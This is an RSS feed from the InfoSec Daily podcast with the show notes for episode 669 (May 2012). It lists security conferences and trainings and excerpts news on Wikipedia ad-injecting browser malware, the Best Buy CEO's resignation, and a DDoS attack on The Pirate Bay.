<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
		xmlns:itunes="http://www.itunes.com/dtds/podcast-1.0.dtd"
	xmlns:media="http://search.yahoo.com/mrss/"
>

<channel>
	<title>InfoSec Daily &#187; Podcast</title>
	<atom:link href="http://www.isdpodcast.com/category/podcast/feed" rel="self" type="application/rss+xml" />
	<link>http://www.isdpodcast.com</link>
	<description>Your daily source of Pwnage, Policy and Politics.</description>
	<lastBuildDate>Thu, 17 May 2012 00:52:59 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.3.2</generator>
	<copyright>Copyright © InfoSec Daily 2011 http://creativecommons.org/licenses/by-nc-sa/2.5/</copyright>
	<managingEditor>admin@isdpodcast.com (Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, and Dr. Bonez.)</managingEditor>
	<webMaster>admin@isdpodcast.com (Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, and Dr. Bonez.)</webMaster>
	<ttl>1440</ttl>
	<image>
		<url>http://www.isdpodcast.com/podcasts/infoSec-Daily-Logo_b_144.jpg</url>
		<title>InfoSec Daily</title>
		<link>http://www.isdpodcast.com</link>
		<width>144</width>
		<height>144</height>
	</image>
	<itunes:subtitle></itunes:subtitle>
	<itunes:summary>Your daily source of Pwnage, Policy and Politics.</itunes:summary>
	<itunes:keywords>Information, Security, Hacking, Vulnerabilities, InfoSec, Exploits, Security, Pwnage, Security, News, Exploits</itunes:keywords>
	<itunes:category text="Technology">
		<itunes:category text="Podcasting" />
	</itunes:category>
	<itunes:category text="Technology" />
	<itunes:category text="Business">
		<itunes:category text="Careers" />
	</itunes:category>
	<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, and Dr. Bonez.</itunes:author>
	<itunes:owner>
		<itunes:name>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, and Dr. Bonez.</itunes:name>
		<itunes:email>admin@isdpodcast.com</itunes:email>
	</itunes:owner>
	<itunes:block>no</itunes:block>
	<itunes:explicit>no</itunes:explicit>
	<itunes:image href="http://www.isdpodcast.com/podcasts/infoSec-Daily-Logo_b_144.jpg" />
		<item>
		<title>Episode 669 &#8211;  WikiMalware, The Heart Wants, PirateBay DDoS, Kickstarter, Avira Headache and Piracy</title>
		<link>http://www.isdpodcast.com/episode-669-wikimalware-the-heart-wants-piratebay-ddos-kickstarter-avira-headache-and-piracy</link>
		<comments>http://www.isdpodcast.com/episode-669-wikimalware-the-heart-wants-piratebay-ddos-kickstarter-avira-headache-and-piracy#comments</comments>
		<pubDate>Thu, 17 May 2012 00:52:59 +0000</pubDate>
		<dc:creator>Karthik.Rangarajan</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3940</guid>
		<description><![CDATA[InfoSec Daily Podcast Episode 669 for May 16, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, &#160;Dr B0n3z, and Karthik Rangarajan. &#160; Announcements EFF DEFCONtest https://supporters.eff.org/civicrm/pcp/info?reset=1&#38;id=42&#38;ap=1 &#160; GraniteSec (formerly The New England InfoSec Tweetup) When: &#160;May 19, 2012&#160;&#160;&#160; Where: &#160;Veasey Memorial Park, Groveland, MA http://granitesec.org &#160; AIDE 2012 When: May 21-25, 2012 Where: [...]]]></description>
			<content:encoded><![CDATA[<p dir="ltr" id="internal-source-marker_0.7400850345813712" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Daily Podcast Episode 669 for May 16, 2012. &nbsp;</span><span style="font-size:13px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, &nbsp;Dr B0n3z, and Karthik Rangarajan.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Announcements</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">EFF DEFCONtest</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><a href="https://supporters.eff.org/civicrm/pcp/info?reset=1&amp;id=42&amp;ap=1"><span style="font-size:13px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">https://supporters.eff.org/civicrm/pcp/info?reset=1&amp;id=42&amp;ap=1</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">GraniteSec (formerly The New England InfoSec Tweetup)<br class="kix-line-break" /><br />
	</span><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;May 19, 2012&nbsp;&nbsp;&nbsp; <br class="kix-line-break" /><br />
	Where: &nbsp;Veasey Memorial Park, Groveland, MA<br class="kix-line-break" /><br />
	</span><a href="http://granitesec.org"><span style="font-size:13px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://granitesec.org</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">AIDE 2012<br class="kix-line-break" /><br />
	</span><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 21-25, 2012<br class="kix-line-break" /><br />
	Where: MU Forensic Science Center &#8211; Huntington, West Virginia<br class="kix-line-break" /><br />
	</span><a href="http://www.appyide.org/"><span style="font-size:13px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.appyide.org/</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">LayerOne 2012<br class="kix-line-break" /><br />
	</span><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 26-27, 2012<br class="kix-line-break" /><br />
	Where: Clarion Hotel &#8211; Anaheim, CA<br class="kix-line-break" /><br />
	</span><a href="http://www.layerone.org/"><span style="font-size:13px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.layerone.org</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Security 504: Hacker Techniques, Exploits &amp; Incident Handling &#8211; Matt Romanek<br class="kix-line-break" /><br />
	</span><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: June 20 &#8211; 27, 2012<br class="kix-line-break" /><br />
	Where: Courtyard Seattle Federal Way, WA <br class="kix-line-break" /><br />
	</span><a href="http://www.sans.org/mentor/details.php?nid=28014"><span style="font-size:13px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.sans.org/mentor/details.php?nid=28014</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Social Engineering Training</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: July 21-24, 2012<br class="kix-line-break" /><br />
	Where: Black Hat Vegas</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: November 12-16, 2012<br class="kix-line-break" /><br />
	Where: &nbsp;Bristol, UK</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><a href="http://www.social-engineer.com/social-engineer-training"><span style="font-size:13px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.com/social-engineer-training</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Inside and Out of the Social-Engineer Toolkit (SET)<br class="kix-line-break" /><br />
	</span><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: July 21 &#8211; 22, 2012<br class="kix-line-break" /><br />
	When: July 23 &#8211; 24, 2012<br class="kix-line-break" /><br />
	Where: Black Hat Vegas<br class="kix-line-break" /><br />
	</span><a href="http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html"><span style="font-size:13px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html</span></a></p>
</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">DerbyCon 2012 &#8211; The &ldquo;Deuce&rdquo; Reunion<br class="kix-line-break" /><br />
	</span><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;September 27-30, 2012<br class="kix-line-break" /><br />
	Where: Louisville, KY<br class="kix-line-break" /><br />
	</span><a href="http://www.derbycon.com/"><span style="font-size:13px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.derbycon.com</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Hack3rCon^3</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: October 19-21, 2012</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Charleston, WV <br class="kix-line-break" /><br />
	</span><a href="http://hack3rcon.org/"><span style="font-size:13px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://hack3rcon.org/</span></a><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Skydogcon<br class="kix-line-break" /><br />
	</span><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: October 26-28<br class="kix-line-break" /><br />
	Where: Hotel Preston in Nashville, TN <br class="kix-line-break" /><br />
	</span><a href="http://www.skydogcon.com"><span style="font-size:13px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.skydogcon.com</span></a><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Hacker Wars &#8212; The Movie</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Ever wanted to participate in Live action Capture the Flag? Well here is your chance</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">What: This contest is modeled on so-called &quot;penetration tests&quot; which is when ethical hackers attempt to break in to a company&#39;s computer systems with the target&#39;s permission. &nbsp;This is in an effort to find security problems before the bad guys do. &nbsp;The contest won&#39;t just involve sitting at computers, it will also involve other typical activities: performing reconnaissance of physical facilities, surveillance of individuals, urban exploration, infiltration of buildings, and surreptitious contact with moles in the target organization.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><a href="http://www.kickstarter.com/projects/278183749/hacker-wars"><span style="font-size:13px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.kickstarter.com/projects/278183749/hacker-wars</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Stories</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://www.infoworld.com/d/the-industry-standard/pc-users-admit-pirating-software-193218"><span style="font-size:13px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.infoworld.com/d/the-industry-standard/pc-users-admit-pirating-software-193218</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Visitors to Wikipedia who see advertisements on the site have most likely fallen victim to a browser-based malware infection, Wikimedia Foundation, the organization operating the website, said on Monday.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;We never run ads on Wikipedia,&quot; said Philippe Beaudette, director of community advocacy for the Wikimedia Foundation, in a </span><a href="http://blog.wikimedia.org/2012/05/14/ads-on-wikipedia-your-computer-infected-malware/"><span style="font-size:13px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">blog post</span></a><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">. &quot;If you&#39;re seeing advertisements for a for-profit industry &#8230; or anything but our fundraiser, then your web browser has likely been infected with malware.&quot;</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">One example of such malware is a rogue Google Chrome extension called &quot;I want this,&quot; Beaudette said. However, similar malicious add-ons might also exist for Mozilla Firefox, Internet Explorer, and other browsers, he said.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">This type of malicious software is known as click fraud malware and can target multiple websites at once. In addition to injecting ads into Web pages, such rogue extensions are also known to hijack search queries in order to earn their creators affiliate revenue, said Graham Cluley, a senior technology consultant at Sophos, in a </span><a href="http://nakedsecurity.sophos.com/2012/05/15/wikipedia-ads-malware/"><span style="font-size:13px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">blog post</span></a><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> Tuesday.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Spotting this type of rogue behavior on Wikipedia is easier than on other websites because the site doesn&#39;t run any commercial advertisements. &quot;We&#39;re here to distribute the sum of human knowledge to everyone on the planet &#8212; ad-free, forever,&quot; Beaudette said.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Wikipedia&#39;s operating costs are covered by donations. An online fundraiser is organized every year, and that&#39;s usually the only time a banner is displayed on the site&#39;s pages.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Users who are seeing commercial ads on Wikipedia should disable all their browser add-ons to determine if they are the source of the problem, Beaudette said.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://news.cnet.com/8301-1001_3-57434047-92/why-best-buy-ceos-expressed-affection-for-employee-was-problem/"><span style="font-size:13px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://news.cnet.com/8301-1001_3-57434047-92/why-best-buy-ceos-expressed-affection-for-employee-was-problem/</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brian Dunn gave Best Buy&#39;s board of directors plenty of reason to doubt that he was the man to </span><a href="http://news.cnet.com/8301-1001_3-57414199-92/best-buy-releases-list-of-stores-to-close-this-year/"><span style="font-size:13px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">engineer the company&#39;s comeback</span></a><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Dunn, 52, who resigned as CEO of the struggling electronics chain last month while the company was investigating his &quot;alleged misconduct,&quot; was taken down by an &quot;inappropriate relationship&quot; with a 29-year-old female employee. That was the finding of investigators who were hired to look into the relationship and Best Buy </span><a href="http://hugin.info/147701/R/1611866/512819.pdf"><span style="font-size:13px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">released their report today</span></a><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The four-page audit included details about Dunn loaning the woman money, giving her use of a hotel room and sending her text messages in which he &quot;expressed affection&quot; for the employee (more on this later). According to Best Buy&#39;s report, Dunn and the woman deny their relationship was sexual or romantic.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Even if it was romantic, is that a big deal? Plenty of executives from powerful companies are married to former employees. But Best Buy&#39;s board claims a line was crossed, a threshold of credibility and honesty. That&#39;s the same line Hewlett-Packard&#39;s board of directors claimed Mark Hurd, its former CEO, also crossed two years ago.</span><img height="371px;" src="https://lh4.googleusercontent.com/zHzBNi8688tiJfPV6F2uEdAUwr2XeuEFni93LjJo3XOYwEnG1lUnitghQo06d_yqLG4ndT5KIlky3Haynn2hp4nOG9ZRMyKE2DgjUzxiPTT9tS1KLzI" width="670px;" /></p>
<p>
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">In 2010, Hurd was pushed out at HP after he was accused of making unwelcome sexual advances towards a public-relations contractor, who was also a former actress and reality television star. Hurd was never accused of flaunting the relationship, but his other, more important relationship with HP&#39;s board of directors had soured so badly, he was forced to step down.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://www.pcmag.com/article2/0,2817,2404504,00.asp"><span style="font-size:13px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.pcmag.com/article2/0,2817,2404504,00.asp</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The Pirate Bay is under fire from an unknown attacker in a distributed denial of service (DDoS) strike that has lasted at least 24 hours.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">In an early morning post to its </span><a href="http://www.facebook.com/ThePirateBayWarMachine"><span style="font-size:13px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Facebook page</span></a><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">, The Pirate Bay announced that it was &quot;under a quite big ddos attack.&quot;</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;We don&#39;t know who&#39;s behind it but we have our suspicions,&quot; the post continued. &quot;Once we&#39;ve awaken our tech guru Winston Q we&#39;ll get on the issue.&quot; By 12:20pm, the site said it was &quot;getting back up [and] stronger than ever,&quot; and pointed user to its </span><a href="http://about.piratereverse.info/proxy/list.html"><span style="font-size:13px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">list of proxies</span></a><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">As of 2pm Eastern time, access to </span><a href="https://thepiratebay.se/"><span style="font-size:13px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">the site</span></a><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> was still spotty.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The attack comes after ISPs in </span><a href="http://www.pcmag.com/article2/0,2817,2403749,00.asp"><span style="font-size:13px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">the U.K.</span></a><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> and </span><a href="http://www.pcmag.com/article2/0,2817,2404269,00.asp"><span style="font-size:13px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">the Netherlands</span></a><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> were ordered to block access to The Pirate Bay over copyright violations. In retaliation, the hacking group Anonymous struck out at Virgin Media, one of the U.K. ISPs ordered to block to the site, prompting The Pirate Bay to equate the move to censorship.</span></p>
